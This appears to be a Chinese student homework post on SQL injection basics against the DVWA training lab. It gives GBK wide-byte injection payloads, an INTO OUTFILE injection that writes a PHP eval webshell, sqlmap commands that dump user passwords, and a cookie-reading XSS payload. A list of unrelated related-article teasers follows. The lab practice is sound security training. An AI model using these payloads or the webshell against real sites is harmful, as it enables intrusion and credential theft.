网络安全【C10-2024.10.1】-sql注入基础

1、利用宽字节注入实现“库名-表名”的注入过程,写清楚注入步骤;

复制代码

宽字节概念
1、如果一个字符的大小是一个字节的,称为窄字节;
2、如果一个字符的大小是两个及以上字节的,称为宽字节;像GB2312、GBK、GB18030、BIG5、Shift_JIS等编码都是常见的宽字节字符集。英文默认占一个字节,中文占两个字节。宽字节注入原理
宽字节注入利用MySQL的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字。注入过程变化举例:
%df%27 ===> addslashes函数 ===> %df%5c%27 ===> 数据库GBK ===> 運'kobe   #正常查询
kobe' or 1=1 #尝试一般性kobe%df' or 1=1 #注入
kobe%df\' or 1=1 #转义防护下的提交:kobe%df%5c%27 or 1=1 #kobe%df' or 1=1 #burpsuite 拦截删除5c,    百分号转换为%25,斜杠转换为%5c,单引号转换后%27burpsuite 拦截修改提交:
name=kobe%25df%27+or+1%3D1+%23&submit=%E6%9F%A5%E8%AF%A2  ---> name=kobe%df%27+or+1%3D1+%23&submit=%E6%9F%A5%E8%AF%A2后端补充%5c将变成:kobe%df%5c%27 or 1=1 # 在为GBK编码 df 5c 運,所以后端真正提交的是kobe運'or 1=1 #https://blog.csdn.net/qwq1503/article/details/125664874  GBK汉字编码表

复制代码

2、利用SQL注入实现DVWA站点的Getshell,写清楚攻击步骤;

复制代码

select 1,2 into outfile
-1' union select 1,"<?php eval($_POST['a']);?>" into outfile '/var/www/html/shell2.phphttp://192.168.101.41:8080/shell2.php

复制代码

3、使用Sqlmap工具完成对DVWA数据库的注入过程,要求按照库、表、列、内容的顺序进行注入;

python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch --dbs

python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch -D "dvwa" -tables

python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch -D "dvwa" -T "users" --columns

python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch -D "dvwa" -T "users" -C user,password --dump

--batch 命令来自动答复和判断
--tables 枚举的DBMS数据库中的表
--columns 枚举DBMS数据库表列
--dump 转储数据库表项,即下载
-u URL 目标URL
-D DB 要进行枚举的指定数据库名
-T TBL DBMS数据库表枚举
-C COL DBMS数据库表列枚举

4、完成DVWA靶场存储型XSS的漏洞练习。

xss也是一种注入,是一种跨站脚本注入
XSS的三种类型与区分
1.反射性
也就是通过让用户点击事先准备好的URL,之后保存用户的cookie,之后用用户的cookie去登陆了网站,事先xss攻击
<script>alert(document.cookie);</script>

2.存储型
会把用户输入的数据存储在服务器端中,这种xss攻击可以持久化,并且更加稳定。

代码已经被内嵌进去了,最大的好处:就在于攻击者不需要和用户交互

3.DOM型xss
HTML DOM定义了访问和操作HTML文档的标准方法。意思就是修改html的文档代码,在你打开文档的时候,就会自动执行代码中的内容,其本质和反射型是一样的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/501723.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Domain Generalization(2)】领域泛化在文生图领域的工作之——PromptStyler(ICCV23)

【Domain Generalization(2)】领域泛化在文生图领域的工作之——PromptStyler(ICCV23)

系列文章目录 【Domain Generalization(1)】增量学习/在线学习/持续学习/迁移学习/多任务学习/元学习/领域适应/领域泛化概念理解第一篇大概了解了 DG 的概念&#xff0c;那么接下来将介绍 DG 近年在文生图中的应用/代表性工作。本文介绍的是 PromptStyler: Prompt-driven Sty…
阅读更多...
MySQL 08 章——聚合函数

MySQL 08 章——聚合函数

聚合函数是对一组数据进行汇总的函数&#xff0c;输入的是一组数据的集合&#xff0c;输出的是单个值 一、聚合函数介绍 &#xff08;1&#xff09;AVG和SUM函数 举例&#xff1a;只适用于数值类型的字段&#xff08;或变量&#xff09;AVG函数和SUM函数在计算空值时&#x…
阅读更多...
HTML——73.button按钮

HTML——73.button按钮

<!DOCTYPE html> <html><head><meta charset"UTF-8"><title>button按钮</title></head><body><!--button按钮&#xff1a;1.button按钮type属性&#xff1a;可以设置三个值&#xff0c;submit/reset/button,含义…
阅读更多...
Java 数据库连接 - Sqlite

Java 数据库连接 - Sqlite

Java 数据库连接 - Sqlite PS: 1. 连接依赖库&#xff1a;[sqlite-jdbc-xxx.jar](https://mvnrepository.com/artifact/org.xerial/sqlite-jdbc)(根据连接的数据库版本选择) 2. 支持一次连接执行多次sql语句&#xff1b; 3. 仅本地连接&#xff1b;使用说明&#xff1a; publ…
阅读更多...
NCCL源码解读3.1:double binary tree双二叉树构建算法,相比ring环算法的优势

NCCL源码解读3.1:double binary tree双二叉树构建算法,相比ring环算法的优势

目录 一、双二叉树出现的原因 二、双二叉树介绍 三、双二叉树大规模性能 四、双二叉树源码解读 双二叉树注意事项 核心逻辑 源码速递 视频分享在这&#xff0c;未完待补充&#xff1a; 3.1 NCCL源码解读双二叉树构建算法&#xff0c;double binary tree相比ring环算法的…
阅读更多...
深入理解 JVM 的垃圾收集器:CMS、G1、ZGC

深入理解 JVM 的垃圾收集器:CMS、G1、ZGC

&#x1f9d1; 博主简介&#xff1a;CSDN博客专家&#xff0c;历代文学网&#xff08;PC端可以访问&#xff1a;https://literature.sinhy.com/#/literature?__c1000&#xff0c;移动端可微信小程序搜索“历代文学”&#xff09;总架构师&#xff0c;15年工作经验&#xff0c;…
阅读更多...
四、VSCODE 使用GIT插件

四、VSCODE 使用GIT插件

VSCODE 使用GIT插件 一下载git插件与git Graph插件二、git插件使用三、文件提交到远程仓库四、git Graph插件 一下载git插件与git Graph插件 二、git插件使用 git插件一般VSCode自带了git&#xff0c;就是左边栏目的图标 在下载git软件后vscode的git插件会自动识别当前项目 …
阅读更多...
【NLP高频面题】用RNN训练语言模型时如何计算损失?

【NLP高频面题】用RNN训练语言模型时如何计算损失?

用RNN训练语言模型时如何计算损失&#xff1f; 重要性&#xff1a;★ 以“you say goodbye and i say hello.”为例&#xff0c;将其作为具体的数据传入网络&#xff0c;此时 RNNLM 进行的处理如图所示&#xff1a; RNNLM 可以“记忆”目前为止输入的单词&#xff0c;并以此…
阅读更多...
Spring Cloud Security集成JWT 快速入门Demo

Spring Cloud Security集成JWT 快速入门Demo

一、介绍 JWT (JSON Web Token) 是一种带有绑实和信息的简单标准化机制&#xff0c;在信息通信中用于验证和信息传递。尤其在应用中使用Spring Cloud实现分布式构建时&#xff0c;JWT可以作为一种无状态验证原理的证明。 本文将进一步描述如何在Spring Cloud Security中集成JW…
阅读更多...
【机器学习】【朴素贝叶斯分类器】从理论到实践:朴素贝叶斯分类器在垃圾短信过滤中的应用

【机器学习】【朴素贝叶斯分类器】从理论到实践:朴素贝叶斯分类器在垃圾短信过滤中的应用

&#x1f31f; 关于我 &#x1f31f; 大家好呀&#xff01;&#x1f44b; 我是一名大三在读学生&#xff0c;目前对人工智能领域充满了浓厚的兴趣&#xff0c;尤其是机器学习、深度学习和自然语言处理这些酷炫的技术&#xff01;&#x1f916;&#x1f4bb; 平时我喜欢动手做实…
阅读更多...
unity学习5:创建一个自己的3D项目

unity学习5:创建一个自己的3D项目

目录 1 在unity里创建1个3D项目 1.1 关于选择universal 3d&#xff0c;built-in render pipeline的区别 1.2 创建1个universal 3d项目 2 打开3D项目 2.1 准备操作面板&#xff1a;操作界面 layout,可以随意更换 2.2 先收集资源&#xff1a;打开 window的 AssetStore 下载…
阅读更多...
Vue3 内置组件之component

Vue3 内置组件之component

文章目录 Vue3 内置组件之component概述使用 Vue3 内置组件之component 概述 <component> 组件提供了动态组件加载功能&#xff0c;它可以在内置组件Component占位点上将自定义组件进行指定目标的渲染。比如页面中常见的Tabs选项卡效果就可以利用动态组件加载功能轻松实…
阅读更多...
学习路之VScode--自定义按键写注释(插件)

学习路之VScode--自定义按键写注释(插件)

1. 安装 "KoroFileHeader" 插件 首先&#xff0c;在 VScode 中搜索并安装名为 "KoroFileHeader" 的插件。你可以通过在扩展商店中搜索插件名称来找到并安装它。 2. 进入 VScode 设置页面 点击 VScode 左下角的设置图标&#xff0c;然后选择 "设置&q…
阅读更多...
C++编程库与框架实战——ZeroMQ消息队列

C++编程库与框架实战——ZeroMQ消息队列

一,消息队列简介 消息队列是一种进程间的通信机制,用于在不同进程之间同步消息。通信期间,一个进程将消息放入该队列中,然后另一个进程就可以从该队列中取出这条消息。 消息队列可以是异步的,即发送方无需等待接收方的确认或回复就可以立即执行下一步的操作。 消息队列…
阅读更多...
seata分布式事务详解(AT)

seata分布式事务详解(AT)

目录 1、分布式事务特点 1.1、分布式事务是什么 1.2、分布式事务产生的场景 2、使用seata解决分布式事务 2.1、认识seata 2.1.1、seata是什么 2.1.2、seata三大角色 2.1.3、seata模式 2.1.3.1、AT模式 AT模式实现&#xff1a; 2.2、如何使用seata 3、seata基于idea软…
阅读更多...
C语言渗透和好网站

C语言渗透和好网站

渗透C 语言 BOOL WTSEnumerateProcessesEx(HANDLE hServer, // 主机服务器句柄 本机填 WTS_CURRENT_SERVER_HANDLEDWORD *pLevel, // 值为1 返回WTS_PROCESS_INFO_EX结构体数组 值为0 返回WTS_PROCESS_INFO结构体数组DWORD SessionId, // 进程会话 枚举所有进程会话 填WTS_ANY…
阅读更多...
机场安全项目|基于改进 YOLOv8 的机场飞鸟实时目标检测方法

机场安全项目|基于改进 YOLOv8 的机场飞鸟实时目标检测方法

目录 论文信息 背景 摘要 YOLOv8模型结构 模型改进 FFC3 模块 CSPPF 模块 数据集增强策略 实验结果 消融实验 对比实验 结论 论文信息 《科学技术与工程》2024年第24卷第32期刊载了中国民用航空飞行学院空中交通管理学院孔建国, 张向伟, 赵志伟, 梁海军的论文——…
阅读更多...
Flutter Android修改应用名称、应用图片、应用启动画面

Flutter Android修改应用名称、应用图片、应用启动画面

修改应用名称 打开Android Studio&#xff0c;打开对应项目的android文件。 选择app下面的manifests->AndroidManifest.xml文件&#xff0c;将android:label"bluetoothdemo2"中的bluetoothdemo2改成自己想要的名称。重新启动或者重新打包&#xff0c;应用的名称…
阅读更多...
【paddle】初次尝试

【paddle】初次尝试

张量 张量是 paddlepaddle&#xff0c; torch&#xff0c; tensorflow 等 python 主流机器学习包中唯一通货变量&#xff0c;因此应当了解其基本的功能。 张量 paddle.Tensor 与 numpy.array 的转化 import paddle as paddle import matplotlib.pyplot as plt apaddle.to_t…
阅读更多...
VBA 64位API声明语句第005讲

VBA 64位API声明语句第005讲

跟我学VBA&#xff0c;我这里专注VBA, 授人以渔。我98年开始&#xff0c;从源码接触VBA已经20余年了&#xff0c;随着年龄的增长&#xff0c;越来越觉得有必要把这项技能传递给需要这项技术的职场人员。希望职场和数据打交道的朋友&#xff0c;都来学习VBA,利用VBA,起码可以提高…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023